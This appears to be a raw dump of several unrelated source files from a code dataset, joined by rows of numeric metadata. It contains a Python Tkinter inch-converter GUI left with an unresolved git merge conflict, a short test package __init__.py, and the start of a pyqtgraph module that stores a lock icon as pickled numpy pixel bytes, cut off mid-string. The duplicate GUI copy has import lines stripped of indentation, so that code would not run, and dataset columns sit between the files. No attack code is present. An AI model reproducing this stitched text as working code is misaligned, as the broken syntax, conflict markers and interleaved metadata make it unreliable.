        _compcolor = '#d9d9d9' # X11 color: 'gray85'
        _ana1color = '#d9d9d9' # X11 color: 'gray85'
        _ana2color = '#ececec' # Closest X11 color: 'gray92'
        # Tk X-font specs: font19 styles the label, font20 the entry box.
        font19 = "-family Consolas -size 12 -weight normal -slant " \
            "roman -underline 0 -overstrike 0"
        font20 = "-family {Courier New} -size 16 -weight bold -slant " \
            "roman -underline 0 -overstrike 0"
        # Window geometry, size limits, title, and icon.
        top.geometry("213x133+905+93")
        top.minsize(350, 1)
        top.maxsize(3844, 1061)
        top.resizable(1, 1)
        top.title("Gimme Inches")
        # Icon is resolved through resource_path so it also works when frozen.
        top.iconbitmap(resource_path('mmicon.ICO'))
        top.configure(background="#000000")
        # Entry1: the value input box; pressing <Return> runs the conversion
        # handler in the support module.
        self.Entry1 = tk.Entry(top)
        self.Entry1.place(relx=0.15, rely=0.35, height=40, relwidth=0.7)
        self.Entry1.focus_set()
        self.Entry1.configure(background="#000000")
        self.Entry1.configure(disabledforeground="#a3a3a3")
        self.Entry1.configure(font=font20)
        self.Entry1.configure(foreground="#7638BB")
        self.Entry1.configure(highlightbackground="#000000")
        self.Entry1.configure(selectbackground="#000000")
        self.Entry1.configure(selectforeground="#38B1BB")
        self.Entry1.configure(insertbackground="#000000")
        self.Entry1.configure(justify='center')
        # Entry text is backed by a StringVar owned by ConvertMM_support.
        self.Entry1.configure(textvariable=ConvertMM_support.inputVAR)
        self.Entry1.bind('<Return>', ConvertMM_support.enter)
        # Input_Text: caption label above the entry, also variable-backed.
        self.Input_Text = tk.Label(top)
        self.Input_Text.place(relx=0.5, rely=0.2, height=20, anchor='center')
        self.Input_Text.configure(background="#000000")
        self.Input_Text.configure(font=font19)
        self.Input_Text.configure(foreground="#7638BB")
        self.Input_Text.configure(textvariable=ConvertMM_support.Input_Text_Var)
        # Convert button from the original PAGE design, currently disabled
        # (conversion is triggered by <Return> instead).
        # self.Button1 = tk.Button(top)
        # self.Button1.place(relx=0.15, rely=0.526, height=40, width=149)
        # self.Button1.configure(activebackground="#730e8c")
        # self.Button1.configure(activeforeground="white")
        # self.Button1.configure(activeforeground="#838383")
        # self.Button1.configure(background="#000000")
        # self.Button1.configure(command=ConvertMM_support.gimmeInches)
        # self.Button1.configure(disabledforeground="#a3a3a3")
        # self.Button1.configure(font=font19)
        # self.Button1.configure(foreground="#838383")
        # self.Button1.configure(highlightbackground="#000000")
        # self.Button1.configure(highlightcolor="black")
        # self.Button1.configure(pady="0")
        # self.Button1.configure(text='''Gimme Inches''')
if __name__ == '__main__':
    # Launch the GUI only when executed as a script, not on import.
    vp_start_gui()
=======
#! /usr/bin/env python
# -*- coding: utf-8 -*-
#
# GUI module generated by PAGE version 4.26
# in conjunction with Tcl version 8.6
# Dec 30, 2019 03:32:14 PM PST platform: Windows NT
import sys
import os
try:
import Tkinter as tk
except ImportError:
import tkinter as tk
try:
import ttk
py3 = False
except ImportError:
import tkinter.ttk as ttk
py3 = True
import ConvertMM_support
def vp_start_gui():
    """Entry point: build the Tk root and main window, then run the loop."""
    global val, w, root
    root = tk.Tk()
    ConvertMM_support.set_Tk_var()
    window = Toplevel1(root)
    ConvertMM_support.init(root, window)
    root.mainloop()
def destroy_Toplevel1():
    """Destroy the app window and drop the global reference to it."""
    global w
    w.destroy()
    w = None
def resource_path(relative_path):
    """Return the absolute path of a bundled resource.

    Under PyInstaller the bundle root is published as ``sys._MEIPASS``;
    during development we fall back to the current working directory.
    """
    base_dir = getattr(sys, '_MEIPASS', os.path.abspath("."))
    return os.path.join(base_dir, relative_path)
class Toplevel1:
    def __init__(self, top=None):
        '''This class configures and populates the toplevel window.
        top is the toplevel containing window.'''
        # PAGE-generated palette constants; most are unused below and kept
        # only for reference.
        _bgcolor = '#000000'  # X11 color: 'black'
        _fgcolor = '#838383'  # Closest X11 color: 'gray51'
        _compcolor = '#d9d9d9' # X11 color: 'gray85'
        _ana1color = '#d9d9d9' # X11 color: 'gray85'
        _ana2color = '#ececec' # Closest X11 color: 'gray92'
        # Tk X-font specs; font19 is only referenced by the disabled button.
        font19 = "-family Consolas -size 16 -weight normal -slant " \
            "roman -underline 0 -overstrike 0"
        font20 = "-family {Courier New} -size 16 -weight bold -slant " \
            "roman -underline 0 -overstrike 0"
        # Window geometry, size limits, title, and icon.
        top.geometry("213x133+905+93")
        top.minsize(350, 1)
        top.maxsize(3844, 1061)
        top.resizable(1, 1)
        top.title("Gimme Inches")
        # Icon is resolved through resource_path so it also works when frozen.
        top.iconbitmap(resource_path('mmicon.ICO'))
        top.configure(background="#000000")
        # Entry1: the value input box; pressing <Return> runs the conversion
        # handler in the support module.
        self.Entry1 = tk.Entry(top)
        self.Entry1.place(relx=0.15, rely=0.35,height=40, relwidth=0.7)
        self.Entry1.focus_set()
        self.Entry1.configure(background="#000000")
        self.Entry1.configure(disabledforeground="#a3a3a3")
        self.Entry1.configure(font=font20)
        self.Entry1.configure(foreground="#999999")
        self.Entry1.configure(highlightbackground="#730e8c")
        self.Entry1.configure(insertbackground="#730e8c")
        self.Entry1.configure(justify='center')
        # Entry text is backed by a StringVar owned by ConvertMM_support.
        self.Entry1.configure(textvariable=ConvertMM_support.inputVAR)
        self.Entry1.bind('<Return>', ConvertMM_support.enter)
        # Convert button from the original PAGE design, currently disabled
        # (conversion is triggered by <Return> instead).
        # self.Button1 = tk.Button(top)
        # self.Button1.place(relx=0.15, rely=0.526, height=40, width=149)
        # self.Button1.configure(activebackground="#730e8c")
        # self.Button1.configure(activeforeground="white")
        # self.Button1.configure(activeforeground="#838383")
        # self.Button1.configure(background="#000000")
        # self.Button1.configure(command=ConvertMM_support.gimmeInches)
        # self.Button1.configure(disabledforeground="#a3a3a3")
        # self.Button1.configure(font=font19)
        # self.Button1.configure(foreground="#838383")
        # self.Button1.configure(highlightbackground="#000000")
        # self.Button1.configure(highlightcolor="black")
        # self.Button1.configure(pady="0")
        # self.Button1.configure(text='''Gimme Inches''')
if __name__ == '__main__':
    # Launch the GUI only when executed as a script, not on import.
    vp_start_gui()
>>>>>>> 1bda16814c81dcc21fcb2be16797f231b787264e
| 33.170306
| 80
| 0.652975
| 898
| 7,596
| 5.424276
| 0.226058
| 0.063231
| 0.098542
| 0.041675
| 0.886882
| 0.886882
| 0.886882
| 0.886882
| 0.886882
| 0.886882
| 0
| 0.080825
| 0.221432
| 7,596
| 228
| 81
| 33.315789
| 0.742814
| 0.267509
| 0
| 0.859259
| 1
| 0
| 0.125746
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.014815
| 0.133333
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
d9e2471a73fdf5bfa69cee438e8fc9a3ef5d99cb
| 140
|
py
|
Python
|
tests/test_common/test_utils/__init__.py
|
gchhablani/code-soup
|
eec666b6cd76bad9c7133a185bb85021b4a390f0
|
[
"MIT"
] | 18
|
2021-07-29T16:21:02.000Z
|
2021-12-13T12:58:15.000Z
|
tests/test_common/test_utils/__init__.py
|
gchhablani/code-soup
|
eec666b6cd76bad9c7133a185bb85021b4a390f0
|
[
"MIT"
] | 93
|
2021-08-04T02:48:15.000Z
|
2022-01-16T04:58:51.000Z
|
tests/test_common/test_utils/__init__.py
|
gchhablani/code-soup
|
eec666b6cd76bad9c7133a185bb85021b4a390f0
|
[
"MIT"
] | 27
|
2021-08-06T06:51:34.000Z
|
2021-11-02T05:47:18.000Z
|
from tests.test_common.test_utils.test_checkpoints import TestCheckpoints
from tests.test_common.test_utils.test_seeding import TestSeeding
| 46.666667
| 73
| 0.9
| 20
| 140
| 6
| 0.5
| 0.15
| 0.216667
| 0.316667
| 0.533333
| 0.533333
| 0.533333
| 0
| 0
| 0
| 0
| 0
| 0.057143
| 140
| 2
| 74
| 70
| 0.909091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
d9fe7f848e8187420fedd8d6901ee9075692d88a
| 65,632
|
py
|
Python
|
uavcan_gui_tool/thirdparty/pyqtgraph/pixmaps/pixmapData_2.py
|
PonomarevDA/inno_uavcan_VTOL_interface
|
76bea66096f1eff72ccc8302b15b6844a66edb2d
|
[
"MIT"
] | null | null | null |
uavcan_gui_tool/thirdparty/pyqtgraph/pixmaps/pixmapData_2.py
|
PonomarevDA/inno_uavcan_VTOL_interface
|
76bea66096f1eff72ccc8302b15b6844a66edb2d
|
[
"MIT"
] | null | null | null |
uavcan_gui_tool/thirdparty/pyqtgraph/pixmaps/pixmapData_2.py
|
PonomarevDA/inno_uavcan_VTOL_interface
|
76bea66096f1eff72ccc8302b15b6844a66edb2d
|
[
"MIT"
] | null | null | null |
pixmapData = {
'lock.png': "cnumpy.core.multiarray\n_reconstruct\np0\n(cnumpy\nndarray\np1\n(I0\ntp2\nS'b'\np3\ntp4\nRp5\n(I1\n(I32\nI32\nI4\ntp6\ncnumpy\ndtype\np7\n(S'u1'\np8\nI0\nI1\ntp9\nRp10\n(I3\nS'|'\np11\nNNNI-1\nI-1\nI0\ntp12\nbI00\nS'\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xad\\xad\\xad\\x19\\xa8\\xa8\\xa8\\x8d\\xa9\\xa9\\xa9\\xc1\\xa9\\xa9\\xa9\\xf1\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xf1\\xaa\\xaa\\xaa\\xc2\\xa9\\xa9\\xa9\\x8e\\xad\\xad\\xad\\x19\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xa8\\xa8\\xa8X\\xa9\\xa9\\xa9\\xed\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xed\\xa8\\xa8\\xa8X\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xaa\\xaa\\xaaW\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa6\\xa6\\xa6\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x
a6\\xa6\\xa6\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xaa\\xaa\\xaaW\\xff\\xff\\xff\\x00\\xaa\\xaa\\xaa\\x15\\xa9\\xa9\\xa9\\xeb\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x88\\x88\\x88\\xff)))\\xff\\x05\\x05\\x05\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x05\\x05\\x05\\xff)))\\xff\\x88\\x88\\x88\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xeb\\xaa\\xaa\\xaa\\x15\\xa9\\xa9\\xa9\\x88\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x88\\x88\\x88\\xff\\x03\\x03\\x03\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x03\\x03\\x03\\xff\\x88\\x88\\x88\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\x88\\xa9\\xa9\\xa9\\xbe\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff)))\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff)))\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9
\\xbe\\xa9\\xa9\\xa9\\xf1\\xa9\\xa9\\xa9\\xff\\xa6\\xa6\\xa6\\xff\\x05\\x05\\x05\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x05\\x05\\x05\\xff\\x16\\x16\\x16\\xff\\x16\\x16\\x16\\xff\\x16\\x16\\x16\\xff\\x16\\x16\\x16\\xff\\x16\\x16\\x16\\xff\\x16\\x16\\x16\\xff\\x16\\x16\\x16\\xff\\x16\\x16\\x16\\xff\\x0c\\x0c\\x0c\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x05\\x05\\x05\\xff\\xa6\\xa6\\xa6\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xf1\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff@@@\\xff\\xd2\\xd2\\xd2\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe1\\xe1\\xe1\\xff{{{\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x0e\\x0e\\x0e\\xff***\\xff+++\\xff+++\\xff\\xaf\\xaf\\xaf\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe2\\xe2\\xe2\\xff\\x10\\x10\\x10\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00
\\xff\\x00\\x00\\x00\\xff\\x1e\\x1e\\x1e\\xff\\x93\\x93\\x93\\xff\\xc6\\xc6\\xc6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\x1d\\x1d\\x1d\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xffaaa\\xff\\xdc\\xdc\\xdc\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\x1d\\x1d\\x1d\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\\\\\\\\\\\\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe2\\xe2\\xe2\\xff\\xbb\\xbb\\xbb\\xff\\x9f\\x9f\\x9f\\xff\\x9f\\x9f\\x9f\\xff\\x9f\\x9f\\x9f\\xff\\xd7\\xd7\\xd7\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\x1d\\x1d\\x1d\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x1c\\x1c\\x1c\\xff\\xda\\xda\\xda\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\x91\\x91\\x91\\xff\\x0f\\x0f\\x0f\\xff\\x00\\x00
\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\xb4\\xb4\\xb4\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\x1d\\x1d\\x1d\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x87\\x87\\x87\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\x98\\x98\\x98\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\xb4\\xb4\\xb4\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\x1d\\x1d\\x1d\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\xba\\xba\\xba\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\x19\\x19\\x19\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\xb4\\xb4\\xb4\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\x1d\\x1d\\x1d\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xff\\x08\\x08\\x08\\xff\\xe2\\xe2\\xe2\\xff\\xe6\\xe6\\xe6\\xff\\xcc\\xcc\\xcc\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\xb4\\xb4
\\xb4\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\x1d\\x1d\\x1d\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xff\\x08\\x08\\x08\\xff\\xe2\\xe2\\xe2\\xff\\xe6\\xe6\\xe6\\xff\\xcc\\xcc\\xcc\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\xb4\\xb4\\xb4\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\x1d\\x1d\\x1d\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\xba\\xba\\xba\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\x19\\x19\\x19\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\xb4\\xb4\\xb4\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\x1d\\x1d\\x1